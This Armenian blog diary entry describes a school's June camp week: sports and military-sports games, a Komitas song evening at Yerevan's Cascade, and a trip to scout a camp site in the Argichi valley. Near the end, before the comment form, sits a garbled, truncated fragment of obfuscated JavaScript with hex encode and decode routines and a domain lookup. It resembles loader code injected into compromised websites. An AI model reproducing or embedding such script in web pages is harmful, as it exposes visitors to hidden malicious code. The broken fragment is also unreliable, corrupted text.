Կարկուտն ի՞նչ անի, երկինք ու երկի՞ր մաքրի-պարզի: Արված է:

Իմ 692-րդ գրով, հաշված անգամ իմ օրագրի կիրակիներով, առտու-գիշերվա նույն ժամին, երբ Աշոտիկ-Դավիթը` մեր տղուկը, իր-իմ տեղում է` կատարած «դարձ ի շրջանս իւր», ես` իմ տեղում, իմ աթոռին, իմ իրավունքով, ասում եմ, լսե´ք, բոլոր կարգի ու տարիքի սեբաստացիներ, որտեղ էլ որ կաք… ի˜նչ շաբաթ է դիմացներս` հերթական ու Ավագ` հունիսի 13-ից սկսվող Բանգլադեշյան ամենամյա բաց պլեներից առաջ, նրան ընդառաջ…

Կարկուտն ու ծիածանը Բանգլադեշում։  Լուսանկարները` Լուսինե Բուշի, Արմինե Թոփչյանի, Մարիետ Սիմոնյանի։

Հունիսի 6–ից-10-ը մեր ուսումնական ճամբարային  երկրորդ շաբաթվա օրերն են` մարզական, ռազմամարզական, ճամփորդական. աշխատանքային մեր առօրյան կավարտվի ընտանեկան-սեբաստացիական տոնախմբությամբ Երևանի կասկադում, հունիսի 10-ին`  ժամը 20:00-21:00:  Մեկ ժամ մենք միասին կերգենք, կխաղանք, կպարենք Կոմիտաս, ողջ երկրի ու ողջ ամառվա համար հակաբացիլ կտարածենք` Կոմիտաս… Ահա այս 10 երգերը, թույլ տվեք իմ վերջնական ընտրությամբ, Արթուր Շահնազարյանի ու ձեր բոլորիդ համաձայնությամբ, իհարկե, մանկական աղոթքով սկսված,  «Այբ, բեն, գիմ»-ով ավարտված…

Սրա համար մենք` յուրաքանչյուրս, բերանացի կանենք «անգիր արած ջրի պես», այս տաս երգ-խաղերը, որպես առողջաբեր հաբեր` այս կիրակի օրով սկսած, Ավագ շաբաթվա ամեն ընտանեկան իրիկուն ու ճամբարային առավոտ…

Հունիսի 7-ին, ընդհանուր ճամբարային պարապմունքը կանենք բոլոր սեբաստացի ճամբարականներով միասին, Մարմարյա սրահում. ուշադիր, մուտքը Մայր դպրոց` Բաբաջանյան պողոտայի Մարզական դռնով և կրթական Պուրակի դռնով…

Հունիսի 8-ին` ռազմամարզական հունիսյան ամառային խաղերն են, մարզական-ճամփորդական ամառվա մեր պատրաստության-ուրախության ստուգատեսը: Ահա այսպիսի ծրագիր նախնական, որ հունիսի 7-ին, առավոտվա ընդհանուր պարապմունքին, Մայր դպրոցի Մարմարյա սրահում կճշտենք…

Սևանի «Ժայռ» ճամբարում։
Լուսանկարները` Գայանե Միրաքյանի։

Այո՛, միշտ պատրաստ, ռազմամարզական-ճամփորդական: Այո՛, մեր բանգլադեշյան ծովերի-լողափերի ստուգատես` մաքուր, անվտանգ, գրավիչ, անվային խաղերի, հեծանվային, չմշկային, թե այլ ստուգատես, գնդակով, պարանով, օղակով, մարմնամարզական` դրսում, թե ներսում ստուգատես, արգելքների հաղթահարման պատրաստություն, մեծ ստուգատես… Ամբողջ շաբաթը իսկական ստուգատես կլինի աշխատանքի ճամբարի` չորս ջոկատների ու ավելացող մարտիկների, երկրագործության ստուգատես։ Իմացա՞ք, ծափահարե´ք: Ավագ դպրոցի աշխատանքային ջոկատը վստահ սկսել է ղեկավարել Միքայել Ղազարյանը: Տեսե´ք` ի˜նչ տեսք է ունենալու Մարզադաշտը հունիսի 8-ին: Այսպիսի կիրակի, Ավագ շաբաթվա, երբ ջնջվել են աշխատանքի-հանգստի սահմանները…

Չորրորդ դասարանցիները հենց կիրակի օրով, այսօր են «ինքնաստուգվելու» մաթեմատիկայից… Նույն խաղաղ-արդար-դեղին (լույսի, արևի գույնը) օրը-միջավայրը կլինի, ինչպես մայրենիի օրը` հունիսի 1-ը, երաշխավորված է մեր կյանքով, մանկավարժության մեր հավատամքով:

Լուսանկարները` Հասմիկ Պողոսյանի։

Քիչ հետո իմ մի մեքենա ընկերների հետ մեկնում եմ աշխատանքային այցի Արգիճի գետի հովիտ` ներքին-Վերին Գետաշեն, Մադինա, Գեղհովիտ` մեր ևս մեկ ամառային արշավախմբային ճամբարի տեղը որոշելու… Կգամ, կպատմեմ, իմ 700-րդ գրին ինքչա˜ն կա:

Ահա և իմ կիրակնօրյա ընթերցարանը:

Իսկ ինչպե՞ս է լույսը բացվում Երևանում, մեր տան պատշգամբից… հետևե´ք Օրագրին ամեն օր, անընդհատ…

Արգիճի հովտում ։
Լուսանկարները` Անահիտ Մելքոնյանի։

#692

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Մեր ժամանակների տիրակալները

Այսպես հաճախ չի լինում, որ արթնանում ես ու ոչ միայն գիտես՝ ինչ ես գրելու, այլև գիտես վերնագիրը, գիտես՝ ինչպես ես սկսելու, շարունակությունը գիտես. արթնանում ես՝ գրելու, որոշակի տեքստ փոխանցելու համար,

Հուլիս է, բացվե՛ք, ինչպես մանուկն օրորոցում, երբ շոգում է…

— Դե՛, գլուխս մի տար, շո՜ւտ գրկի առյուծին, տա՛ր լողացրու, կեղտից ազատի… հո ես խոզ չեմ, առյուծ եմ… Այսպես, ահա, շարունակեց-կտրեց իմ առավոտյան արթնացման ծեսը Դավիթը Բլեյան… Տեսնեք՝ ո՜նց  է

Մեկնարկ-սկիզբ ինչի՞. նորի ու նոր փոխանցմա՞ն…

Ֆլեշմոբի տնային խնդիրներ ենք սկսել Դավիթ Բլեյանի հետ լուծել… Սեբաստացի հոր կարգավիճակ է, ծրագրային ամբողջականություն է ենթադրում… Այսպես որ գնա, հայրիկը պիտի մասնակցի ծնողական հավաքներին-սեմինարներին… ծնող կանչոցներին, թուքումուր ուտոցիներին… Պատրաստ